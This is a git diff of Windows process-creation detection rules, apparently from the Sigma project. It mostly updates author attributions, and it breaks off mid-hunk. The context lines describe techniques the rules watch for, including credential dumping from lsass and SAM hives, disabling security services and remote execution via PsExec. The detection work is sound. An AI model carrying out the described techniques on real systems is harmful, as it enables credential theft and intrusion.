Detects suspicious PowerShell invocation command parameters -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/05 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_obfuscation_via_utf8.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_obfuscation_via_utf8.yml index 719342b7c..db2d56c27 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_powershell_obfuscation_via_utf8.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_obfuscation_via_utf8.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious encoded character syntax often used for defense evasion references: - https://twitter.com/0gtweet/status/1281103918693482496 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/07/09 modified: 2023/01/05 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_sam_access.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_sam_access.yml index 8c1392850..d450ee181 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_powershell_sam_access.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_sam_access.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious PowerShell scripts accessing SAM hives references: - https://twitter.com/splinter_code/status/1420546784250769408 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/07/29 modified: 2023/01/06 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_script_engine_parent_.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_script_engine_parent_.yml index d17c4f684..c8b04c202 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_powershell_script_engine_parent_.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_script_engine_parent_.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious powershell invocations from interpreters or unusual programs references: - https://www.securitynewspaper.com/2017/03/20/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/01/16 modified: 2023/01/05 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_sub_processes.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_sub_processes.yml index ca500b437..594616514 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_powershell_sub_processes.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_sub_processes.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious child processes spawned by PowerShell references: - https://twitter.com/ankit_anubhav/status/1518835408502620162 -author: Florian Roth, Tim Shelton +author: Florian Roth (Nextron Systems), Tim Shelton date: 2022/04/26 modified: 2023/01/05 logsource: diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_webclient_casing.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_webclient_casing.yml index 9445f3367..5fdc0c8b1 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_powershell_webclient_casing.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_webclient_casing.yml @@ -4,7 +4,7 @@ status: experimental description: Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques references: - https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/05/24 modified: 2023/01/05 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_pressynkey_lolbin.yml b/rules/windows/process_creation/proc_creation_win_susp_pressynkey_lolbin.yml index c8dce3fd0..6d59951ce 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_pressynkey_lolbin.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_pressynkey_lolbin.yml @@ -4,7 +4,7 @@ status: test description: Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary references: - https://twitter.com/mrd0x/status/1463526834918854661 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/01/11 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_susp_procdump_lsass.yml b/rules/windows/process_creation/proc_creation_win_susp_procdump_lsass.yml index b6296c627..f2fcac60c 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_procdump_lsass.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_procdump_lsass.yml @@ -4,7 +4,7 @@ status: stable description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable. references: - Internal Research -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/10/30 modified: 2022/08/12 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_process_hacker.yml b/rules/windows/process_creation/proc_creation_win_susp_process_hacker.yml index 504b362cb..8e96d4e03 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_process_hacker.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_process_hacker.yml @@ -6,7 +6,7 @@ references: - https://processhacker.sourceforge.io/ - https://github.com/winsiderss/systeminformer - https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/10/10 modified: 2022/12/30 logsource: diff --git a/rules/windows/process_creation/proc_creation_win_susp_progname.yml b/rules/windows/process_creation/proc_creation_win_susp_progname.yml index 315a621d6..88680395c 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_progname.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_progname.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/02/11 logsource: category: process_creation diff --git a/rules/windows/process_creation/proc_creation_win_susp_ps_appdata.yml b/rules/windows/process_creation/proc_creation_win_susp_ps_appdata.yml index a35b5e770..175f4b781 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_ps_appdata.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_ps_appdata.yml @@ -5,7 +5,7 @@ description: Detects a suspicious command line execution that invokes PowerShell references: - https://twitter.com/JohnLaTwC/status/1082851155481288706 - https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03 -author: Florian Roth, Jonhnathan Ribeiro, oscd.community +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community date: 2019/01/09 modified: 2022/07/14 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_ps_downloadfile.yml b/rules/windows/process_creation/proc_creation_win_susp_ps_downloadfile.yml index d085225c5..d3bbeb15e 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_ps_downloadfile.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_ps_downloadfile.yml @@ -4,7 +4,7 @@ status: test description: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line references: - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/08/28 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_ps_encoded_obfusc.yml b/rules/windows/process_creation/proc_creation_win_susp_ps_encoded_obfusc.yml index a980cfc51..e33804f13 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_ps_encoded_obfusc.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_ps_encoded_obfusc.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines references: - https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/07/11 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml b/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml index 14a3ff9bf..4421be335 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml @@ -7,7 +7,7 @@ status: experimental description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account) references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/07/21 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml b/rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml index 5732b16d6..c5859f891 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml @@ -5,7 +5,7 @@ description: Detects suspicious launch of a renamed version of the PSEXESVC serv references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec - https://www.youtube.com/watch?v=ro2QuZTIMBM -author: FLorian Roth +author: Florian Roth (Nextron Systems) date: 2022/07/21 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml b/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml index ec93b3203..d75bab36a 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml @@ -9,7 +9,7 @@ references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec - https://www.poweradmin.com/paexec/ - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html -author: Florian Roth, Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali date: 2021/11/23 modified: 2022/11/18 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml b/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml index ba727cd67..686aa98aa 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml @@ -9,7 +9,7 @@ references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec - https://www.poweradmin.com/paexec/ - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html -author: Florian Roth, Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali date: 2021/05/22 modified: 2022/10/06 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_psloglist.yml b/rules/windows/process_creation/proc_creation_win_susp_psloglist.yml index 9ff176fb9..eb5bcd295 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_psloglist.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_psloglist.yml @@ -7,7 +7,7 @@ references: - https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos - https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList - https://twitter.com/EricaZelic/status/1614075109827874817 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2021/12/18 modified: 2023/01/16 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_razorinstaller_explorer.yml b/rules/windows/process_creation/proc_creation_win_susp_razorinstaller_explorer.yml index 63cd4722c..28ed9c1ec 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_razorinstaller_explorer.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_razorinstaller_explorer.yml @@ -5,7 +5,7 @@ description: Detects a explorer.exe sub process of the RazerInstaller software w references: - https://twitter.com/j0nh4t/status/1429049506021138437 - https://streamable.com/q2dsji -author: Florian Roth, Maxime Thiebaut +author: Florian Roth (Nextron Systems), Maxime Thiebaut date: 2021/08/23 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_recon_network_activity.yml b/rules/windows/process_creation/proc_creation_win_susp_recon_network_activity.yml index 792bba63b..b041e1e8e 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_recon_network_activity.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_recon_network_activity.yml @@ -4,7 +4,7 @@ status: test description: Detects a set of suspicious network related commands often used in recon stages references: - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/02/07 tags: - attack.discovery diff --git a/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml b/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml index 4c75a6f71..73c55dd89 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml @@ -7,7 +7,7 @@ references: - https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1 - https://vms.drweb.fr/virus/?i=24144899 - https://bidouillesecurity.com/disable-windows-defender-in-powershell/ -author: Florian Roth, John Lambert (idea), elhoim +author: Florian Roth (Nextron Systems), John Lambert (idea), elhoim date: 2021/07/14 modified: 2022/05/05 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_regedit_trustedinstaller.yml b/rules/windows/process_creation/proc_creation_win_susp_regedit_trustedinstaller.yml index 9aff7aa42..086e7d4e7 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_regedit_trustedinstaller.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_regedit_trustedinstaller.yml @@ -4,7 +4,7 @@ status: test description: Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe references: - https://twitter.com/1kwpeter/status/1397816101455765504 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/05/27 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml index 9634b5e92..fb0a2ae7b 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml @@ -5,7 +5,7 @@ description: Detects various anomalies in relation to regsvr32.exe references: - https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ -author: Florian Roth, oscd.community, Tim Shelton +author: Florian Roth (Nextron Systems), oscd.community, Tim Shelton date: 2019/01/16 modified: 2022/09/21 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml index 0c1f1bc78..f09267f9e 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml @@ -4,7 +4,7 @@ status: test description: Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time references: - https://twitter.com/sbousseaden/status/1282441816986484737?s=12 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/07/13 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_http_pattern.yml b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_http_pattern.yml index 8ccd91eef..715d87889 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_http_pattern.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_http_pattern.yml @@ -5,7 +5,7 @@ description: Detects a certain command line flag combination used by regsvr32 wh references: - https://twitter.com/mrd0x/status/1461041276514623491c19-ps - https://twitter.com/tccontre18/status/1480950986650832903 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/01/11 modified: 2023/01/11 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_no_dll.yml b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_no_dll.yml index a74ed1de0..32603fb9a 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_no_dll.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_no_dll.yml @@ -4,7 +4,7 @@ status: test description: Detects a regsvr.exe execution that doesn't contain a DLL in the command line references: - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/07/17 modified: 2022/12/25 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_remote_share.yml b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_remote_share.yml index 81722239d..df740e4fc 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_remote_share.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_remote_share.yml @@ -4,7 +4,7 @@ status: experimental description: Detects REGSVR32.exe to execute DLL hosted on remote shares references: - https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/31 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_susp_renamed_adfind.yml b/rules/windows/process_creation/proc_creation_win_susp_renamed_adfind.yml index 2eb10b892..e79d1b756 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_renamed_adfind.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_renamed_adfind.yml @@ -9,7 +9,7 @@ references: - https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/ - https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx - https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/08/21 modified: 2022/11/01 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml b/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml index 1fe5e9242..ed6ea8c99 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml @@ -5,7 +5,7 @@ description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility references: - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ - https://twitter.com/bopin2020/status/1366400799199272960 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/09/20 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml b/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml index 492c2bb21..c80685a81 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/gN3mes1s/status/1222088214581825540 - https://twitter.com/gN3mes1s/status/1222095963789111296 - https://twitter.com/gN3mes1s/status/1222095371175911424 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/01/28 modified: 2021/12/08 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_renamed_debugview.yml b/rules/windows/process_creation/proc_creation_win_susp_renamed_debugview.yml index 9e0f2b328..283c0d520 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_renamed_debugview.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_renamed_debugview.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious renamed SysInternals DebugView execution references: - https://www.epicturla.com/blog/sysinturla -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/05/28 modified: 2022/11/29 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_renamed_paexec.yml b/rules/windows/process_creation/proc_creation_win_susp_renamed_paexec.yml index 8f13a3765..a5c6d3fd0 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_renamed_paexec.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_renamed_paexec.yml @@ -4,7 +4,7 @@ status: test description: Detects execution of renamed version of PAExec. Often used by attackers references: - https://www.poweradmin.com/paexec/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/05/22 modified: 2022/10/26 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml b/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml index d0285fd93..765ed19a0 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml @@ -7,7 +7,7 @@ references: - https://github.com/Neo23x0/DLLRunner - https://twitter.com/cyb3rops/status/1186631731543236608 - https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/10/22 modified: 2022/12/04 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_rundll32_inline_vbs.yml b/rules/windows/process_creation/proc_creation_win_susp_rundll32_inline_vbs.yml index 69a1bbe9d..2815cf47f 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_rundll32_inline_vbs.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_rundll32_inline_vbs.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452 references: - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/03/05 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml b/rules/windows/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml index 4512432ae..04b77fd79 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious command line patterns used when rundll32 is used to run JavaScript code references: - http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/01/14 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_susp_rundll32_keymgr.yml b/rules/windows/process_creation/proc_creation_win_susp_rundll32_keymgr.yml index cc9dcdff0..1bb6a8373 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_rundll32_keymgr.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_rundll32_keymgr.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager) references: - https://twitter.com/NinjaParanoid/status/1516442028963659777 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/04/21 tags: - attack.credential_access diff --git a/rules/windows/process_creation/proc_creation_win_susp_rundll32_no_params.yml b/rules/windows/process_creation/proc_creation_win_susp_rundll32_no_params.yml index 603780101..c75edce38 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_rundll32_no_params.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_rundll32_no_params.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity references: - https://www.cobaltstrike.com/help-opsec -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/05/27 modified: 2022/10/06 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_rundll32_sys.yml b/rules/windows/process_creation/proc_creation_win_susp_rundll32_sys.yml index 6b2780776..b3ca0324b 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_rundll32_sys.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_rundll32_sys.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452 references: - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/03/05 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_rurat_exec_location.yml b/rules/windows/process_creation/proc_creation_win_susp_rurat_exec_location.yml index f2a53981b..f37c18e95 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_rurat_exec_location.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_rurat_exec_location.yml @@ -4,7 +4,7 @@ status: experimental description: Detects execution of Remote Utilities RAT (RURAT) from an unsual location (outisde of 'C:\Program Files') references: - https://redcanary.com/blog/misbehaving-rats/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/19 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtask_creation.yml b/rules/windows/process_creation/proc_creation_win_susp_schtask_creation.yml index c0e05d16d..3e10b8fca 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_schtask_creation.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_schtask_creation.yml @@ -2,7 +2,7 @@ title: Scheduled Task Creation id: 92626ddd-662c-49e3-ac59-f6535f12d189 status: test description: Detects the creation of scheduled tasks in user session -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/01/16 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtask_creation_temp_folder.yml b/rules/windows/process_creation/proc_creation_win_susp_schtask_creation_temp_folder.yml index 6ee19e819..d4f4c7e67 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_schtask_creation_temp_folder.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_schtask_creation_temp_folder.yml @@ -4,7 +4,7 @@ status: test description: Detects the creation of scheduled tasks that involves a temporary folder and runs only once references: - https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/03/11 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_change.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_change.yml index e04f307fb..ad1f11745 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_change.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_change.yml @@ -8,7 +8,7 @@ description: | references: - Internal Research - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/28 modified: 2022/11/18 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml index b08e23407..29a3951fd 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml @@ -9,7 +9,7 @@ status: experimental description: Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities references: - Internal Research -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/09 tags: - attack.impact diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml index 08df46a4e..4fe2263a1 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/09 tags: - attack.impact diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml index c998d6b3f..385d2a114 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml @@ -5,7 +5,7 @@ description: Detects Schtask creations that point to a suspicious folder or an e references: - https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/ - https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/02/21 modified: 2022/09/18 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_folder_combos.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_folder_combos.yml index 9157659e8..9c689f045 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_folder_combos.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_folder_combos.yml @@ -4,7 +4,7 @@ status: experimental description: Detects scheduled task creations that have suspicious action command and folder combinations references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/04/15 modified: 2022/11/18 tags: diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_parent.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_parent.yml index 83ad7615b..1a226b241 100644 --- 